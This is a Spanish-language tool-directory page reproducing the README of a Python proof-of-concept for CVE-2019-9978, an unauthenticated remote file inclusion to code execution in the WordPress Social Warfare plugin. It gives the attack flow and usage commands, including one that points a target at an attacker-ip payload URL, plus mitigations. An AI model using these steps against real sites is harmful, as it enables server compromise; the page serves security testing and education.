Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Una prueba de concepto personalizada en Python que muestra el análisis de causa raíz y la explotación de CVE 2019-9978 (plugin Social Warfare), centrándose en el flujo práctico de ataque de RFI a RCE.

Ver Repositorio
12hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9978 RCE PoC – Exploit del plugin Social Warfare de WordPress

De Inclusión Remota de Archivos (RFI) no autenticada a Ejecución Remota de Código (RCE)


📌 Descripción

Este repositorio contiene una Prueba de Concepto (PoC) basada en Python que demuestra la explotación de CVE-2019-9978, una vulnerabilidad crítica en el plugin Social Warfare de WordPress.

La vulnerabilidad permite a un atacante no autenticado realizar una Inclusión Remota de Archivos (RFI), que puede escalarse a Ejecución Remota de Código (RCE)* al alojar un payload malicioso en un servidor controlado por el atacante.

Este PoC fue desarrollado y probado en un entorno de laboratorio WordPress controlado únicamente con fines educativos y de pruebas de seguridad autorizadas.


🔍 Resumen de la vulnerabilidad

  • CVE ID: CVE-2019-9978
  • Componente afectado: Social Warfare (plugin de WordPress)
  • Versiones afectadas: ≤ 3.5.2
  • Tipo de vulnerabilidad: Inclusión Remota de Archivos (RFI)
  • Impacto: Ejecución Remota de Código (RCE)
  • Autenticación requerida: No
  • Vector de ataque: Remoto
  • Severidad: Crítica

  • 🧠 Análisis de la causa raíz

    El plugin Social Warfare no valida ni sanea adecuadamente la entrada proporcionada por el usuario utilizada para la inclusión remota de contenido.
    Como resultado, un atacante puede proporcionar una URL externa maliciosa, lo que conduce a una inclusión remota de archivos no autenticada.

    Cuando el archivo remoto incluido contiene código PHP ejecutable, se ejecuta en el contexto del servidor WordPress, lo que resulta en ejecución remota de código.


    🔄 Flujo del ataque

    root@kitploit:~
    
    Unauthenticated HTTP Request
    ↓
    Remote File Inclusion (External URL)
    ↓
    Malicious Payload Execution
    ↓
    Remote Code Execution (RCE)
    
    

    🧪 Prueba de Concepto (PoC)

    1. El atacante aloja un payload malicioso en un servidor HTTP externo
    2. El endpoint vulnerable de Social Warfare incluye el archivo remoto
    3. El payload se ejecuta en el servidor WordPress objetivo
    4. El atacante obtiene ejecución remota de comandos
    5. El script de explotación automatiza este proceso con fines de prueba e investigación

    ▶️ Uso

    Paso 1: Alojar el payload

    root@kitploit:~
    python3 -m http.server 8000
    

    Coloque su archivo de payload (por ejemplo, payload-main.txt) en el directorio del servidor.


    Paso 2: Ejecutar el exploit

    root@kitploit:~
    python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
    

    🛠 Requisitos

    • Python 3.x
    • Versión vulnerable del plugin Social Warfare de WordPress
    • Entorno de pruebas de WordPress
    • Servidor HTTP local o remoto para alojar el payload

    🛡 Mitigación y Defensa

    • Actualizar el plugin Social Warfare a una versión parcheada

    • Deshabilitar la inclusión remota de archivos:

      root@kitploit:~
      allow_url_include = Off
      
    • Restringir el manejo de URL externas en los plugins de WordPress

    • Implementar un Firewall de Aplicaciones Web (WAF) con reglas de detección de RFI


    ⚠️ Aviso Legal

    Este proyecto está destinado únicamente a fines educativos y pruebas de seguridad autorizadas.

    NO utilice esta Prueba de Concepto contra sistemas sin permiso explícito. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.


    🔗 Referencias y Créditos

    • Investigador original: Luka Sikic
    • Referencia original del PoC: https://github.com/hash3liZer/CVE-2019-9978
    • Autor / Adaptación: Vaidehi Muluru

    Descargar herramienta